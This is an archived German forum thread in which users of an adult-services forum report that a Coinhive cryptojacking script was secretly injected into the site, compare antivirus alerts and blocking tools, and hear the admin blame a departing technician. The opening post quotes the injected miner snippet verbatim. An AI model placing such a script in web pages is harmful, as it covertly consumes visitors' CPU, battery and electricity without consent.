PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Coinhive Crypto-Miner



marcusysk
05.10.2017, 17:09
Hallo liebe Forums-Admins,

mein Virenscanner ist gerade beim Aufrufen der Titelseite angeschlagen. Offensichtlich ist JS-Code in den Quelltext eingefügt worden, der über die Website "Coinhive" versucht Bitcoins zu minen ohne die Nutzer zu fragen:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('D1t6CmXN8rXhZOQFKY6D97xUsSJ1ag FD');
miner.start();
</script>

Ich finde das ehrlich gesagt nicht lustig und vielleicht könnte mal jemand dazu Stellung beziehen? Allen anderen bis dahin erstmal zur Info.

https://www.golem.de/news/kryptowaehrungen-webseiten-missbrauchen-nutzerrechner-fuer-kryptomining-1710-130403.html

Marcus

pizzabote
05.10.2017, 22:47
Das kann ich ebenfalls bestätigen, auch ich bekomme eine Warnung. Es ist kein üblicher Trojaner oder Virus, aber es nutzt Javascript, damit dann der eigene Rechner eine Kryptowährung bzw. die Blockchain rechnet. So wird der PC bzw. die CPU stark belastet und man gewährt unfreiwillig die Rechenkapazität des eigenen Rechners zum Zwecke anderer, die daran verdienen.

Die Admins sollten hier eine Stellung dazu geben!

augustus380
05.10.2017, 23:31
Hab dasselbe Problem gehabt.

Hades
05.10.2017, 23:39
Mein G DATA Total Security meldet sich auch.53119


Junkware (PUP): Application.BitCoinMiner.SX (Engine A)
Datei: CE94BF5164C04AE312403C4CA6A85F4F3B1133A2
Verzeichnis: C:\Users\Harichter_2\AppData\Local\Mozilla\Firefox \Profiles\8qy6ymxb.default\cache2\entries
Prozess: firefox.exe

Heineken77
05.10.2017, 23:53
Ihr meint soetwas hier?

53121

Ich weiß aber auch nicht woher das kommt. Ich versuche mich mal schlau zu machen.

Update: Hmm, jetzt ist es weg :confused:

tee100
06.10.2017, 00:22
Mein Rechner lief auf Volllast. Safari steigt dann mit Fehlermeldung aus. Runtergefahren, hochgefahren, Javascript deaktiviert. Alles gut jetzt. Trotzdem bin ich etwas irritiert. Komisches Gefühl, wenn der eigene Rechner Dinge für Fremde tut, die man nicht in Auftrag gegeben hat.

Fiststueck
06.10.2017, 00:47
Mein Rechner lief auf Volllast. Safari steigt dann mit Fehlermeldung aus. Runtergefahren, hochgefahren, Javascript deaktiviert. Alles gut jetzt. Trotzdem bin ich etwas irritiert. Komisches Gefühl, wenn der eigene Rechner Dinge für Fremde tut, die man nicht in Auftrag gegeben hat.


Dein Rechner braucht wohl noch etwas Führung und Erziehung. Vielleicht solltest Du Dir einen belasbareren suchen?
Meiner hat's erkannt und eliminiert. Manchmal geht eben doch nicht alles ohne guten Schutz. Gutes Gefühl, wenn der eigene Rechner und Fremde Dinge für mich tun, von denen ich gar nicht weiss, dass ich sie in Auftrag gegeben habe.

Heineken77
06.10.2017, 00:54
Wie auf dem Bild zu sehen lief meiner auch auf Anschlag. Ich hatte allerdings keinerlei Fehlermeldungen. Der Rechner hat so agiert als ob er einfach das macht was er soll. Wie der nötige Code jetzt auf die Seite hier kam weiß ich allerdings im Moment nicht. Und ja, das ist ein komisches Gefühl und ich will mir gar nicht vorstellen, wie das auf schwächeren Rechnern, oder auf welchen mit einem schlechtem CPU-Management aussieht. Ich denke mein Notebook hätte einfach krampfhaft versucht die Anforderung abzuarbeiten und damit jegliche Eingabe unmöglich gemacht. Ich war auch gerade sehr erstaunt als ich die Auslastung gesehen habe. Volle Auslastung habe ich eigentlich nur beim Video rendern, selbst bei den meißten Benchmarks schlagen nicht alle voll aus.

pizzabote
06.10.2017, 01:04
Ich empfehle AddOns für den Browser wie z.B. NoScript, da werden generell die Skripe blockiert und wenn benötigt dann eingeschaltet.

Fiststueck
06.10.2017, 01:34
(...( und ich will mir gar nicht vorstellen, wie das auf schwächeren Rechnern, oder auf welchen mit einem schlechtem CPU-Management aussieht. Ich denke mein Notebook hätte einfach krampfhaft versucht die Anforderung abzuarbeiten und damit jegliche Eingabe unmöglich gemacht. (...)

Also mein Notebook läuft auf dem letzten Ast - da ist nix mehr zu holen (und da hat es dieser Wirrus aufgegeben).


Das kann ich ebenfalls bestätigen, auch ich bekomme eine Warnung. Es ist kein üblicher Trojaner oder Virus, aber es nutzt Javascript, damit dann der eigene Rechner eine Kryptowährung bzw. die Blockchain rechnet. So wird der PC bzw. die CPU stark belastet und man gewährt unfreiwillig die Rechenkapazität des eigenen Rechners zum Zwecke anderer, die daran verdienen.

Die Admins sollten hier eine Stellung dazu geben!

Na klar: Kryptowährung! Wieder so'n Fake-Krams.
Das kommt davon, wenn Mann die CPU wählt! Stark belastet und gewährt die Kapazitität eigener Unfreiwilliger zum Zwecke Anderer!

Genau, Ihr Admins! Raus mit der Sprache: Was habt Ihr mit der Mergel zu tun? In welcher Stellung?

pizzabote
06.10.2017, 01:51
Die Verlinkung ist gleich im Body vom HTML Code zu finden...

53122

Heineken77
06.10.2017, 11:38
Na klar: Kryptowährung! Wieder so'n Fake-Krams.
Von Kryptowährung mag man halten was man will, Fake ist es allerdings nicht, ebensowenig wie ein Virus.


Die Verlinkung ist gleich im Body vom HTML Code zu finden...

53122

Ja, das ist offensichtlich gezielt eingebettet wurden.

Ich weiß davon nichts, finde es allerdings nicht schlimm. Ich finde das ist eine nette Idee der Querfinanzierung eines Forums. Allerdings sollte man bei sowas die CPU-Last stark begrenzen, dann entsteht auch niemanden ein Schaden. Wenn man, als Beispiel, das Ganze auf 10% der CPU-Last begrenzt steigt auch der Energieverbrauch der CPU nur minimal an, das ist selbst bei mobilen Geräten kaum spürbar. So wie das jetzt eingestellt war war es allerdings Mist. <---- Das ist nur meine persönliche Meinung. Ich habe keine Ahnung wer das warum eingebettet hat!

rocco28
06.10.2017, 12:34
Hallo
bekomme auch den Fehler,

Fiststueck
06.10.2017, 12:50
Na klar: Kryptowährung! Wieder so'n Fake-Krams.


Von Kryptowährung mag man halten was man will, Fake ist es allerdings nicht, ebensowenig wie ein Virus.

Hehe! Mit Kryptowährung kenne ich mich aber aus!
Mancher FK wird das bestätigen: Fisti ist wieder aus ihrer Gruft erwacht...



Von Kryptowährung mag man halten was man will, Fake ist es allerdings nicht, ebensowenig wie ein Virus.



Ja, das ist offensichtlich gezielt eingebettet wurden.

Ich weiß davon nichts, finde es allerdings nicht schlimm. Ich finde das ist eine nette Idee der Querfinanzierung eines Forums. Allerdings sollte man bei sowas die CPU-Last stark begrenzen, dann entsteht auch niemanden ein Schaden. Wenn man, als Beispiel, das Ganze auf 10% der CPU-Last begrenzt steigt auch der Energieverbrauch der CPU nur minimal an, das ist selbst bei mobilen Geräten kaum spürbar. So wie das jetzt eingestellt war war es allerdings Mist. <---- Das ist nur meine persönliche Meinung. Ich habe keine Ahnung wer das warum eingebettet hat!

Oha!
Heftig... Doch nicht alles so ohne...

Hades
06.10.2017, 12:50
Ich habe vollkommenes Verständnis dafür, dass ein Forum finanziert sein will. Ob Bannerwerbung, Mitgliedsbeiträge oder was weiß ich. Dass man den Usern allerdings etwas heimlich unterjubelt, was ihre Maschinenlast deutlich erhöht, das finde ich schon ein ziemlich starkes Stück. Und unprofessionell. Ich meine Akkulaufzeiten und auch Lebensdauern von CPUs. Mit einer rechtzeitigen Kommunikation hätte man sich die jetzige Aufregung erspart und bestimmt auch Verständnis von den Usern erhalten.

Da Verantwortliche immer noch schweigen sieht es für mich nach dem Bubenstück aus, das ich wie oben erwähnt kritisiere.

Fiststueck
06.10.2017, 13:13
Tja, wer immer noch glaubt, irgendwer tue irgendwas ganz ohne kommerziellen Hintergrund, uneigennützig, ehrenamtlich, aus ideologischen Gründen - der vergißt, von sich auf andere zu schliessen.

augustus380
06.10.2017, 15:04
Da muss ich Hades zustimmen. Bin jetzt auch sehr irritiert.

Heineken77
06.10.2017, 15:38
Tja, wer immer noch glaubt, irgendwer tue irgendwas ganz ohne kommerziellen Hintergrund, uneigennützig, ehrenamtlich, aus ideologischen Gründen - der vergißt, von sich auf andere zu schliessen.
Das Forum ist schon lange kostenpflichtig, von daher ist das ja nichts neues.



Ich habe vollkommenes Verständnis dafür, dass ein Forum finanziert sein will. Ob Bannerwerbung, Mitgliedsbeiträge oder was weiß ich. Dass man den Usern allerdings etwas heimlich unterjubelt, was ihre Maschinenlast deutlich erhöht, das finde ich schon ein ziemlich starkes Stück. Und unprofessionell. Ich meine Akkulaufzeiten und auch Lebensdauern von CPUs. Mit einer rechtzeitigen Kommunikation hätte man sich die jetzige Aufregung erspart und bestimmt auch Verständnis von den Usern erhalten.

Da Verantwortliche immer noch schweigen sieht es für mich nach dem Bubenstück aus, das ich wie oben erwähnt kritisiere.

So wie ich das im Moment sehe hat wohl eher jemand getestet ob und wie das Ganze überhaupt funktioniert. Von daher sehe ich (noch) keine Veranlassung dazu das zu kommunizieren. Deutlich ist aber auch das derjenige der das implementiert hat "ein wenig" über das Ziel herausgeschossen ist. Für einen Test spricht auch der kurze Zeitraum in dem er stattgefunden hat.

So, oder so: Auch ich stelle im Moment nur Vermutungen an, sobald ich was handfestes weiß lasse ich es euch wissen.

straker
06.10.2017, 15:50
Heute blockt mir mein Virenscanner bei jedem Aufrufen unserer Forenseite (und nur bei dieser Seite!) einen " JS:Miner-A "

Habe keine Ahnung was das ist, jedenfalls mag ihn mein Scanner nicht:) -meistens hat er recht!

Osiris
06.10.2017, 15:59
Meine Maschine läuft in kürzester Zeit auf 100% CPU Last.
Dies ist seit zwei Tagen so.

Wann fliegt das Script endlich wieder raus?

trustno
06.10.2017, 16:08
Ich stimme hades zu, so etwas ist ein Unding.
Wenn man versucht Geld zu verdienen über einen offiziellen Weg wie Werbe-Banner schalten oder Mitgliedsgebühren zu verlangen ist es ok,
aber zu versuchen heimlich über erhöhte Stromkosten und CPU-Verbrauch den Kunden Geld aus der Tasche zu ziehen, ist es scheiße.
Viel Gewinn lässt sich damit sowieso nicht machen, glaub ich, nur wenn man Millionen Besucher hat oder so.
In letzter Zeit habe ich auf diversen News-Seiten von Crypto-Mining gelesen, und wie es heimlich Webseiten wie Pirate Bay mit vielen Benutzern implementieren um
Geld aus der Tasche der Kunden zu ziehen. Crypto-Mining lohnt sich dann, wenn der Gewinn die Stromkosten für den CPU/GPU-Verbrauch übersteigt.

Ich benutze Firefox mit dem Addon uBlock Origin, welches nicht nur Werbung sondern zum Glück auch Crypto-Miner blocken.
Noscript benutze ich ungern da sonst viele andere Features von Webseiten mit JS besuche.

Wenn hier Leute wie heineken77 von "testen" oder "experimentieren" reden, ist das für mich eine billige Ausrede.

Osiris
06.10.2017, 16:16
Meine Maschine läuft in kürzester Zeit auf 100% CPU Last.Dies ist seit zwei Tagen so.Wann fliegt das Script endlich wieder raus?JS komplett zu deaktivieren ist für mich nicht praktikabel. Aber bei den von mir genutzen Browsern kann ich einzelne URL hinterlegen bei denen JS dann deaktiviert ist.Für mich ist die Sache technisch erledigt.

Heineken77
06.10.2017, 16:21
Wenn hier Leute wie heineken77 von "testen" oder "experimentieren" reden, ist das für mich eine billige Ausrede.

Nein, ist es nicht. Es ist einfach meine persönliche Meinung. Ich habe mit dem technischem Aufbau und der Finanzierung des Forums nichts zu tun. Und ich schrieb ja auch, das die Nutzung des Miners in dieser Form Mist ist. Ich sagte das ich die Idee grundsätlich nicht schlecht finde, allerdings sollte man halt die CPU-Last stark begrenzen. Ob die CPU ein paar % mehr, oder weniger leisten muss fällt nicht wirklich ins Gewicht. Eine volle Auslastung aber durchaus. Bei mir würde das einen Unterschied von über 150W ausmachen und ja, das ist heftig. Und ich stimme auch damit überein, das soetwas kommuniziert werden muss. Ich meinte dahingehend nur das ich es im Moment noch nicht für nötig erachte, weil ich das wirklich für einen Testlauf halte.

Hades
06.10.2017, 18:30
Für einen Test spricht auch der kurze Zeitraum in dem er stattgefunden hat.

Heineken, zuallererst einen Dank an dich. Wenigstens einer, der etwas sagt. Auch wenn du nach eigener Aussage nichts weißt und keine Veränderungen durchführen kannst.

Der "Test" hält leider an trotz massiv geäußerter Kritik über das Vorgehen und fehlender Erklärung seitens des Betreibers. Mit Aufruf der Website stieg die CPU-Auslastung von 1-3 % auf 100 % und mit ein paar Sekunden Verzögerung läuft seitdem auch der CPU-Lüfter im Dauerbetrieb. Egal ob eingeloggt oder nicht. Daumen nach unten.

https://www.wired.de/collection/tech/browser-mining-streaming-krypto-browser

Zitat: "Jedoch werden CoinHive und ähnliche Skripte mittlerweile auch von zahlreichen Werbeblocker ausgefiltert. Gesondert geblockt werden können sie zudem mit Plug-ins wie MinerBlock (https://chrome.google.com/webstore/detail/minerblock/emikbbbebcdfohonlaifafnoanocnebl) oder NoCoin(https://addons.mozilla.org/en-US/firefox/addon/no-coin/)."

Wird gemacht! :D Ich wäre einer derjenigen gewesen, der das Forum mit einem Anteil seiner CPU-Leistung unterstützt hätte. Aber nicht so mit dem Prozessor am Vollausschlag.

Heineken77
06.10.2017, 18:38
Ja, mit dem "stattgefunden hat" hatte ich Unrecht. Ich bin davon ausgegangen, weil es bei mir nur eine begrenzte Zeit auftrat und dann nicht mehr, bzw. nur einmal kurz. Ich musste aber feststellen das uBlock (welches ich auch nutze) das Script tatsächlich blockt. Warum es das nicht immer tut weiß ich nicht.

Aber im Moment bleibt es dabei: Nix genaues weiß ich nicht. Ich gehe auch davon aus, das das sich bis Montag nicht ändert, hallo Wochenende.

Homer
06.10.2017, 18:39
Im Firefox mit uBlock Origin, Privacy Badger und HTTPS Everywhere kein Anstieg der CPU-Auslastung; unter Chrome ohne div. Erweiterungen 100%.
Nicht sehr erfreulich.

augustus380
06.10.2017, 18:39
Ist ja wohl nicht zu übersehen, das der " Test" anhält.

Homer
06.10.2017, 18:41
Test ist gut, eher Sauerei:mad:

Heineken77
06.10.2017, 18:42
Im Firefox mit uBlock Origin, Privacy Badger und HTTPS Everywhere kein Anstieg der CPU-Auslastung; unter Chrome ohne div. Erweiterungen 100%.
Nicht sehr erfreulich.


Ist ja wohl nicht zu übersehen, das der " Test" anhält.

Ja, habe ich mittlerweile auch bemerkt. Ich hatte erst nicht gesehen das es durch uBlock geblockt wird. Ich habe es mittlerweile auch mit anderen Browsern (ohne add-ons) getestet und kann bestätigen das es aktiv ist.

Ich würde gerne mehr dazu schreiben, aber im Moment weiß ich halt auch nichts.

urmele
06.10.2017, 22:38
Beim Aufrufen der Seite wird bei mir folgendes angezeigt!

53139

Homer
06.10.2017, 23:24
Was wird angezeigt?:mad:

Heineken77
06.10.2017, 23:26
Was wird angezeigt?:mad:

Eine Meldung das die Verbindung zu Coinhive sicher getrennt wurde.

Ich hatte den Anhang eigentlich repariert :confused:

MisterDynamit
07.10.2017, 06:29
Scheint wohl doch nicht alles im Lot zu sein.
CPU und Lüfter spielen verrückt wenn ich im Forum bin.

boomstick
07.10.2017, 12:12
und was soll nun die Lösung sein?

Hades
07.10.2017, 12:16
Ganz einfach: Die Verantwortlichen schweigen und kümmern sich nicht bisher. Also muss der User Schutzmaßnahmen umsetzen. Es gibt genügend Erwähnungen im Thread. Ist eine Angelegenheit von wenigen Minuten. Oder das Forum meiden. Das wäre allerdings kaum im Sinne aller Beteiligten.

Wenn_dann_ohne
07.10.2017, 12:25
Die Lösung kann eigentlich nur sein, diese Seite zu meiden.
Endweder der Admin schiebt uns bewußt ein Script unter - das ginge dann in die Richtung Abzocke, weil wir ohne unser Wissen mit unserem Strom und unserer Hardware bezahlen. Oder der Admin weiß oder wußte davon nichts und ist einfach nicht in der Lage das Script zu entfernen. Beide Möglichkeiten sind wenig schmeichelhaft für den Betreiber der Seite.

Praktische Lösung: Einen Scriptblocker wie z.B. Noscript, Policy Control, uBlock, Adguard etc als Browsererweiterung (Firefox oder Chrom, keine Ahnung, ob es sowas auch für den MS-Schrott Internet explorer oder Edge gibt) installieren.

schultz
07.10.2017, 13:10
Was ihr nur alle habt , mein Rechner läuft ohne Probleme ... mit installierten uBlock Origin :D:D:D

Wenn_dann_ohne
07.10.2017, 13:18
Was ihr nur alle habt , mein Rechner läuft ohne Probleme ... mit installierten uBlock Origin :D:D:D
Schön, dass Dein Rechner ohne Probleme läuft. Gibt halt andere die keinen Scriptblocker haben oder der Virenscanner das nicht automatisch erkennt.

Zudem ist es unmöglich, dass hier so ein Programm im Hintergrund läuft - warum auch immer (siehe auch #36).

Elektronik altert bei Wärme, zudem wird beim Handy der Akku leergesaugt.
Wir bezahlen alle unsere DSL-Leitung und den Strom, da will ich keine unerwünschten Schmarotzer haben.

boomstick
07.10.2017, 13:38
Ja, das sehe ich auch so. Das mit den script blocker ist ja okay. Trotzdem, sollte man die Seite sauber halten.

Osiris
07.10.2017, 16:44
und was soll nun die Lösung sein?Für Chrome Nutzer ist die Lösung ganz einfach. Zusätzliche Programme werden nicht benötigt.Einstellungen / erweiterte EinstellungenDatenschutz / Inhaltseinstellungen / JavaScriptAusnahmen verwaltenhttps://www.tabulose-huren.com auf blockieren setzen.Damit wird JavaScript auf dieser Seite nicht mehr ausgeführt.Danach Browserfenter neu laden.

straker
07.10.2017, 16:45
Nachden ich schon in #19 genau wie @urmele in #30 einen Angriff von JS:Miner-A gemeldet habe, kommt inzwischen die Attacke einer neuen Variante JS:Miner-C

53146 Troja lässt grüßen!

Magier07
07.10.2017, 17:10
Bin auch gerade ein paar Minuten mit meinem Handy online und der Akku ist sehr schnell von 80% auf 40% geschrumpft und das Handy ist sehr warm geworden.
wenn das wirklich bewusst hier eingeführt wurde von den Betreibern, dann ist das wirklich eine absolute Frechheit.
Wenn es ein Virus oder Trojaner ist, hoffe ich das es bald eine Lösung gibt.

urmele
07.10.2017, 18:04
@Osiris, danke für deinen Hinweis! Ich habe die Einstellung wie von dir beschrieben geändert und erhalte keine Warnung mehr.

boomstick
07.10.2017, 18:10
Gut, das löst alles die Probleme wenn man nicht Mobil ist. Aber was macht man wenn man z.B. Chrome Mobil auf iOS nutzt? Bei Safari weiss ich, kann man Java scripts deaktivieren, aber wo kann man das bei der Mobilen Version von Chrom?

franken.stecher
07.10.2017, 18:14
Hier im Forum ist definitiv Schadcode drin. Ursache:
1. Wurde von den Betreibern (oder jemand mit erlaubtem Zugriff auf den Code) bewusst eingebaut, um sich ein paar Euros dazu zu verdienen.
2. Das Forum wurde gehackt. Ob über eine Sicherheitslücke in der Software, unsichere Passwörter usw ist da mal egal. Dann haben aber noch ganz andere Personen/Parteien Zugriff auf das Forum. Inkl IP-Adressen, Mailadressen usw. Vielleicht sind unsere Daten alle schon abgezogen und kopiert. Inkl Fotos und Berichten.

Wie auch immer, das sind jetzt schon zwei Tage, in denen die Admins offensichtlich Null komme nichts unternommen haben. Das ist entweder Inkompetenz oder Ignoranz...
Für mich ein Grund, zu gehen. Solchen Leuten traue ich keine weiteren Daten/Tracking mehr an. Bye!

lonewolf
07.10.2017, 18:26
Für mich ein Grund, zu gehen. Solchen Leuten traue ich keine weiteren Daten/Tracking mehr an. Bye!

Habe seinem Wunsch Folge geleistet und ihn gesperrt.


Vielleicht sind unsere Daten alle schon abgezogen und kopiert. Inkl Fotos und Berichten.

Puh, da hast du ja nochmal richtig Glück gehabt, dass du die vergangenen 8 Jahre werder berichtet noch Fotos gepostet hast. ;)

urmele
07.10.2017, 18:31
@franken.stecher, du magst mit deiner Aussage ja Recht haben,aber bei 9 Beiträgen in 8 Jahren werden wir dich nicht vermissen.Hier gibt es aber auch aktive Mitglieder, die zu ihrem Forum stehen.

NEO
07.10.2017, 19:13
Hallo und guten Abend,

ich muss leider gestehen, das ich auch nicht so richtig weiss, wie das Script dort reingekommen ist.
Ich hab mich mal bei unseren Technikern informiert und es will natürlich keiner gewesen sein. Es wurde jetzt auf jeden Fall deaktiviert und ich werde mich am MOntag nochmal zu dem Thema melden.
Neo

Heineken77
07.10.2017, 19:15
Danke!

p.s. Der Text ist zu kurz...

beatricchen
07.10.2017, 20:57
Jetzt springt die Seite auch wieder sofort uaf den letzen Beitrag, wenn man draufklickt, da war ja zuletzt eine Riesenverzögerung drin.

siehe auch hier:
https://tabulose-huren.com/showthread.php/43061-Frage-an-die-Technik-link-zum-letzten-Beitrag

schultz
08.10.2017, 12:34
Jetzt springt die Seite auch wieder sofort uaf den letzen Beitrag, wenn man draufklickt, da war ja zuletzt eine Riesenverzögerung drin.
siehe auch hier:
https://tabulose-huren.com/showthread.php/43061-Frage-an-die-Technik-link-zum-letzten-Beitrag
(https://tabulose-huren.com/showthread.php/43061-Frage-an-die-Technik-link-zum-letzten-Beitrag)
Ist seit eine Woche ca. schon wieder so, unabhängig von dem script :p, was auch immer da gemacht wurde.

straker
08.10.2017, 15:40
Jetzt springt die Seite auch wieder sofort uaf den letzen Beitrag, wenn man draufklickt, da war ja zuletzt eine Riesenverzögerung drin.

siehe auch hier:
https://tabulose-huren.com/showthread.php/43061-Frage-an-die-Technik-link-zum-letzten-Beitrag

Stimmt beatricchen, ist bei mir seit Heute auch wieder o.k. -hatte ja schon bischen genervt!

Kollege Schultz hat sicher "schnelleres Internet" :p

schultz
08.10.2017, 16:07
Ne ne nur max.16mbit, ist aber wirklich seit heute nicht erst wieder i.O. :)

Heineken77
08.10.2017, 16:15
Ist seit eine Woche ca. schon wieder so, unabhängig von dem script :p, was auch immer da gemacht wurde.

Also bei mir ist die Ladezeit volkommen ok :confused:

schultz
08.10.2017, 16:20
Jetzt ja, aber bis vor kurzen war es eben nicht so.
Was ja auch einige bestätigt haben. :-)

Heineken77
08.10.2017, 16:22
Jetzt ja, aber bis vor kurzen war es eben nicht so.
Was ja auch einige bestätigt haben. :-)

Oh mann, wer lesen kann ist im Vorteil. "..ist bei seit heute auch wieder ok" und Heineken liest "...ist bei mir seit heute auch wieder so" :rolleyes:

boomstick
09.10.2017, 10:11
http://www.huren-bewertung.com/Default.aspx, das Script ist auch hier versteckt und müssten noch entfernt werden.

NEO
09.10.2017, 16:02
Ich hatte ja versprochen, mich nochmal zu melden bezüglich des Themas.

Also so ganz klar ist es immer noch nicht. Aber so wie es aussieht, handelt es sich um ein "Abschiedsgeschenk" eines Technikers. Leider können wir das ganze nicht wirklich beweisen, weshalb ich da jetzt nicht ausführtlicher werden kann.
Wegen der anderen Seite kümmere ich mich noch drum.

Neo

Snuggles68
10.10.2017, 00:15
Im Quelltext findet er sich aber immer noch: script src="https://coinhive.com/lib/coinhive.min.js"

doctordick
10.10.2017, 00:19
Im Quelltext findet er sich aber immer noch: script src="https://coinhive.com/lib/coinhive.min.js"

Kann sein oder auch nicht, aber dafür hat der Doc hier auch gerade was bzw. wen gefunden, wobei, wenn er ehrlich ist, musste er nicht einmal suchen.

Homer
10.10.2017, 19:16
Hier was aus Heise zu Coinhive:
https://www.heise.de/newsticker/meldung/Hacker-entdecken-verstecktes-Mining-von-Kryptowaehrungen-als-Einnahmequelle-3852644.html

doctordick
12.10.2017, 16:53
Und es geht munter weiter ...
Norton blockierte einen Angrif von: Web Attack: JSCoinminer Download 8 Norton blockierte einen Angrif von: Web Attack: JSCoinminer Download 6 ... und nun?

Homer
12.10.2017, 17:45
Was mich irritiert ist, alle Jammern und haben irgendwelche Probleme. Bei mir läuft alles very esay. Allerdings Scriptblocker und uBlock installiert, schon seit Längerem.
Und mobil ins Forum, äußerst selten.

Hades
12.10.2017, 18:23
Ich habe keine Meldung, wenn ich Skripte nicht blockiere. Und die CPU-Last meines Rechners liegt dabei im normalen und niedrigen Bereich.

Homer, es ist schön, wenn alles normal läuft, weil man auf Userseite die Barrieren hochgezogen hat bzw. hochziehen musste. Zuallererst sollte aber doch gelten, dass eine Website sich fair verhält und ihre User nicht mit versteckten Maßnahmen und Vorgängen zum Nachteil der User überrascht. Der Begriff "Userjammern" trifft m. E. die Situation nicht so richtig.

Das meine ich jetzt allgemein und nicht auf unser Forum hier speziell bezogen, denn Neo sagte ja, dass das hier ein Abschiedsgeschenk eines Technikers war.

Heineken77
12.10.2017, 20:01
Ich habe es gerade nochmal mit Edge und Chrome getestet. Beide haben bei mir keine Erweiterungen, da ich sie nur für Testzwecke nutze und bei Beiden ist alles in Ordnung, keine Meldungen und keine überhöhte CPU-Last.

doctordick
12.10.2017, 21:07
Na, wenn alles in Ordnung ist, muss wohl alles in Ordnung sein.

Fiststueck
13.10.2017, 15:57
Ich hab da mal eine Frage:
Beim heutigen Bitcoin-Kurs, 1 BTC : 4.626,22740410 €, wieviel ist das dann in KM-Dollar? :confused:

http://www.finanzen.net/nachricht/devisen/kurstreiber-bitcoin-gold-bitcoin-schiesst-ueber-nacht-auf-nie-gesehene-rekorde-5746398



(Bit-Coin ist keine Bier-Währung. Angesichts der Bit-Hausse gewinnt der Slogan "Bitte ein Bit!" wohl auch eine ganz neue Bedeutung.)

NEO
13.10.2017, 18:03
Also wir haben hier auch keine weiteren Probleme festgestellt. Allerdings war der Code noch auf der Seite - aber auskommentiert. Der Code wurde also nicth aufgerufen. Aber wir wollten die Änderungen nicht direkt löschen, sondern erstmal dokumentieren.
Möglicherweise haben sich daran schon der eine oder andere Virenscanner gestört.

Wir haben aber jetzt auch den auskommentierten Code rausgenommen.


Schönes Wochenende Euch allen

Neo

P.S. Freitag der 13. ist immer noch wesentlich besser als Montag der egal wievielte

Heineken77
13.10.2017, 19:35
[SIZE=2]Ich hab da mal eine Frage:
Beim heutigen Bitcoin-Kurs, 1 BTC : 4.626,22740410 €, wieviel ist das dann in KM-Dollar? :confused:



http://www.finanzen.net/devisen/bitcoin-euro-kurs zur Zeit ist 1 BTC = 4815 EUR

Fiststueck
13.10.2017, 19:42
http://www.finanzen.net/devisen/bitcoin-euro-kurs zur Zeit ist 1 BTC = 4815 EUR


Ist der in den 4 Stunden dermaßen gestiegen?

Heineken77
13.10.2017, 19:43
Ist der in den 4 Stunden dermaßen gestiegen?

Der Schwankt extrem, wobei er im Moment stark nach oben geht.

Fiststueck
13.10.2017, 20:00
Der Schwankt extrem, wobei er im Moment stark nach oben geht.


Jaja... der beeindruckt mich schon:
Der geht stramm nach oben, schießt nachts ungebremst weiter und schlägt alle Rekorde...
Geil! :eek:

steve-john
13.10.2017, 20:41
[QUOTE=NEO;486394]Also wir haben hier auch keine weiteren Probleme festgestellt. Allerdings war der Code noch auf der Seite - aber auskommentiert. Der Code wurde also nicth aufgerufen. Aber wir wollten die Änderungen nicht direkt löschen, sondern erstmal dokumentieren.
Möglicherweise haben sich daran schon der eine oder andere Virenscanner gestört.

Wir haben aber jetzt auch den auskommentierten Code rausgenommen.


Schönes Wochenende Euch allen

Neo

-
Vielen Dank
->
doctordick (https://www.tabulose-huren.com/member.php/68812-doctordick)https://www.tabulose-huren.com/images/statusicon/user-offline.pngVirus - Angriff durch JSCoinminer (https://www.tabulose-huren.com/showthread.php/43343-Virus-Angriff-durch-JSCoinminer)

#2 "Noch Fragen? und hier #62 "Na, wenn alles in Ordnung ist, muss wohl alles in Ordnung sein"
Nein, keine Fragen weiter. Es ist wieder alles "OK" nachdem der Code rausgenommen wurde.





(https://www.tabulose-huren.com/member.php/68812-doctordick)

https://www.tabulose-huren.com/images/statusicon/user-offline.png

boomstick
17.11.2017, 16:31
https://huren-bewertung.com/ <- Hier wieder 100% CPU Last.

Heineken77
17.11.2017, 16:40
https://huren-bewertung.com/ <- Hier wieder 100% CPU Last.

Ich habe da keine aufällige CPU-Last. Getestet habe ich es gerade mit Firefox, Chrome, Edge und Opera.

eurnie
17.11.2017, 18:03
Habe es gerade mit chrome probiert und ist von nul auf 37 % geschossen als ich zu habe ist er zuruck auf nul.

Heineken77
17.11.2017, 18:32
Habe es gerade mit chrome probiert und ist von nul auf 37 % geschossen als ich zu habe ist er zuruck auf nul.

Jepp, ihr habt Recht! Vorhin hat mein Antivirus das Ding zwar geblockt, aber irgendwie vergessen mir das auch zu melden. :rolleyes: Jetzt kam auch die entsprechende Meldung.

eurnie
11.02.2018, 17:41
Also da muss wieder wass sein, sobald ich die seite aufruffe habe ich nachricht vom antivirus das er die seite geblockt hat.

ich_bins_hier
12.02.2018, 09:46
benutze besser einen guten adblocker und nicht diese komischen Antivirusaddons für die Browser

Heineken77
12.02.2018, 10:04
Also da muss wieder wass sein, sobald ich die seite aufruffe habe ich nachricht vom antivirus das er die seite geblockt hat.
Also bei mir ist nichts. Es wird nichts geblockt und die CPU-Auslastung ist da wo sie sein soll. Ich habe gerade 4 Browser offen und mein Anti-Virus-Programm ist zum Testen ausgeschaltet. Adblocker ist ebenfalls aus, bzw. gar nicht installiert, je nach Browser. :confused:

benutze besser einen guten adblocker und nicht diese komischen Antivirusaddons für die Browser
Ist aber trotzdem blöd, wenn die Seite Scheiße macht. :)

eurnie
12.02.2018, 15:20
Hab es gerade nochmal probiert Kaspersky hat die seite 5 mal in 30 secunden geblockt.

tee100
15.02.2018, 21:43
Gestern war ein Artikel in der FAZ (Frankfurter Allgemeine Zeitung). Ist das hier auch unser Thema? Sind wir (wie der Author schreibt) "gekapert" worden? Oder bezieht sich das auf meinen Rechner?
54737

Heineken77
15.02.2018, 22:23
Gestern war ein Artikel in der FAZ (Frankfurter Allgemeine Zeitung). Ist das hier auch unser Thema? Sind wir (wie der Author schreibt) "gekapert" worden? Oder bezieht sich das auf meinen Rechner?

Wurde schon beantwortet:

Ich hatte ja versprochen, mich nochmal zu melden bezüglich des Themas.

Also so ganz klar ist es immer noch nicht. Aber so wie es aussieht, handelt es sich um ein "Abschiedsgeschenk" eines Technikers. Leider können wir das ganze nicht wirklich beweisen, weshalb ich da jetzt nicht ausführtlicher werden kann.
Wegen der anderen Seite kümmere ich mich noch drum.

Neo

eurnie
10.12.2018, 16:35
Hallo kaspersky schlägt alarm bei huren-bewertung ist wieder ein miner am arbeiten.

Heineken77
13.12.2018, 21:14
Hallo kaspersky schlägt alarm bei huren-bewertung ist wieder ein miner am arbeiten.

